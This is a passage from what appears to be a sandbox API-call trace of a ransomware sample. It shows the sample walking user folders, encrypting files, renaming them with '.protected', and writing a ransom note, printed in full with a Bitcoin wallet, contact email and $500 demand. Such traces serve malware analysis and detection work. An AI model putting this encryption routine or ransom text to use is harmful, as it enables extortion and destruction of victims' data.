[0084.816] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.816] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.816] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.816] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\.") returned 95 [0084.816] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.816] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.816] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.816] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.816] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\fkluidu0\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.816] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.816] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.816] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.816] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.816] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.816] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.816] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\..") returned 96 [0084.816] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.816] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.816] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.816] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.816] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.816] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.817] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.817] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.817] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\RESTORE_FILES.txt") returned 111 [0084.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\fkluidu0\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.817] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.817] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.818] lstrlenA (lpString="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") returned 684 [0084.818] WriteFile (in: hFile=0x150, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.818] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.818] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, 
lpOverlapped=0x0) returned 1 [0084.818] CloseHandle (hObject=0x150) returned 1 [0084.818] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.818] lstrcmpiW (lpString1="index.dat", lpString2="Windows") returned -1 [0084.819] lstrcmpiW (lpString1="index.dat", lpString2="Program Files") returned -1 [0084.819] lstrcmpiW (lpString1="index.dat", lpString2="Program Files (x86)") returned -1 [0084.819] lstrcmpiW (lpString1="index.dat", lpString2="$Recycle.bin") returned 1 [0084.819] lstrcmpiW (lpString1="index.dat", lpString2="System Volume Information") returned -1 [0084.819] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 94 [0084.819] StrStrIW (lpFirst="index.dat", lpSrch=".protected") returned 0x0 [0084.819] lstrcmpW (lpString1="index.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.819] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0084.819] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0084.819] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.819] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 94 [0084.819] StrStrW (lpFirst="index.dat", lpSrch=".txt") returned 0x0 [0084.819] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 94 [0084.819] StrStrW (lpFirst="index.dat", lpSrch=".rar") returned 0x0 [0084.819] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat") returned 94 [0084.819] StrStrW (lpFirst="index.dat", lpSrch=".zip") returned 0x0 [0084.820] ReadFile (in: hFile=0x150, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.822] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.822] WriteFile (in: hFile=0x150, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295e7b4*=0x2800, lpOverlapped=0x0) returned 1 [0084.822] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.823] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0084.823] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0084.823] CloseHandle (hObject=0x150) returned 1 [0084.823] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.protected") returned 104 [0084.824] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\index.dat.protected")) returned 1 [0084.824] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0084.824] lstrcmpiW (lpString1="OWLVMZRC", lpString2="Windows") returned -1 [0084.824] lstrcmpiW (lpString1="OWLVMZRC", lpString2="Program Files") returned -1 [0084.824] lstrcmpiW (lpString1="OWLVMZRC", lpString2="Program Files (x86)") returned -1 [0084.824] lstrcmpiW (lpString1="OWLVMZRC", lpString2="$Recycle.bin") returned 1 [0084.824] lstrcmpiW (lpString1="OWLVMZRC", lpString2="System Volume Information") returned -1 [0084.824] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC") returned 93 [0084.824] lstrcmpW (lpString1="OWLVMZRC", lpString2=".") returned 1 [0084.825] lstrcmpW (lpString1="OWLVMZRC", lpString2="..") returned 1 [0084.825] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\*") returned 95 [0084.825] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\*", lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0x47bad0 [0084.825] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.825] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 
[0084.825] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0084.825] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.825] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.825] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\.") returned 95 [0084.825] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.825] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0084.825] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0084.825] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.825] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\owlvmzrc\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.825] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 1 [0084.825] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.825] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0084.825] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0084.825] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.825] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.825] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\..") returned 96 [0084.825] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.825] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.825] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0084.826] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0084.826] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e4fc | out: pbBuffer=0x295e4fc) returned 1 [0084.826] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e524*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e524*=0x30) returned 1 [0084.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\.." 
(normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.826] FindNextFileW (in: hFindFile=0x47bad0, lpFindFileData=0x295e560 | out: lpFindFileData=0x295e560) returned 0 [0084.826] FindClose (in: hFindFile=0x47bad0 | out: hFindFile=0x47bad0) returned 1 [0084.826] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\RESTORE_FILES.txt") returned 111 [0084.826] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\owlvmzrc\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0084.826] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.826] WriteFile (in: hFile=0x150, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e544*=0x53d, lpOverlapped=0x0) returned 1 [0084.827] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0084.827] WriteFile (in: hFile=0x150, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e544*=0x2ac, lpOverlapped=0x0) returned 1 [0084.827] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.827] WriteFile (in: hFile=0x150, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e544, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e544*=0xb1, lpOverlapped=0x0) returned 1 [0084.827] CloseHandle (hObject=0x150) returned 1 [0084.828] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0084.828] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0084.828] wnsprintfW (in: pszDest=0x514c90, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\RESTORE_FILES.txt") returned 102 [0084.828] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\DOMStore\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\internet explorer\\domstore\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.840] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0084.840] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0084.840] lstrlenA (lpString="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") returned 684 [0084.840] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 
[0084.841] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0084.841] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0084.841] CloseHandle (hObject=0x14c) returned 1 [0084.842] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0084.842] lstrcmpiW (lpString1="frameiconcache.dat", lpString2="Windows") returned -1 [0084.842] lstrcmpiW (lpString1="frameiconcache.dat", lpString2="Program Files") returned -1 [0084.842] lstrcmpiW (lpString1="frameiconcache.dat", lpString2="Program Files (x86)") returned -1 [0084.842] lstrcmpiW (lpString1="frameiconcache.dat", lpString2="$Recycle.bin") returned 1 [0084.842] lstrcmpiW (lpString1="frameiconcache.dat", lpString2="System Volume Information") returned -1 [0084.842] wnsprintfW (in: pszDest=0x504c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat") returned 94 [0084.842] StrStrIW (lpFirst="frameiconcache.dat", lpSrch=".protected") returned 0x0 [0084.842] lstrcmpW (lpString1="frameiconcache.dat", lpString2="RESTORE_FILES.txt") returned -1 [0084.842] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e9dc | out: pbBuffer=0x295e9dc) returned 1 [0084.842] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ea04*=0x30) returned 1 [0084.842] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat" (normalized: "c:\\users\\5p5nrgjn0js 
halpmcxz\\appdata\\local\\microsoft\\internet explorer\\frameiconcache.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0084.843] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat") returned 94 [0084.843] StrStrW (lpFirst="frameiconcache.dat", lpSrch=".txt") returned 0x0 [0084.843] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat") returned 94 [0084.843] StrStrW (lpFirst="frameiconcache.dat", lpSrch=".rar") returned 0x0 [0084.843] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Internet Explorer\\frameiconcache.dat") returned 94 [0084.843] StrStrW (lpFirst="frameiconcache.dat", lpSrch=".zip") returned 0x0 [0084.844] ReadFile (in: hFile=0x14c, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ea24*=0x23f4, lpOverlapped=0x0) returned 1 [0084.853] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0xffffdc0c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0084.853] WriteFile (in: hFile=0x14c, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x23f4, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ea24*=0x23f4, lpOverlapped=0x0) returned 1 [0084.854] SetFilePointerEx (in: hFile=0x14c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | 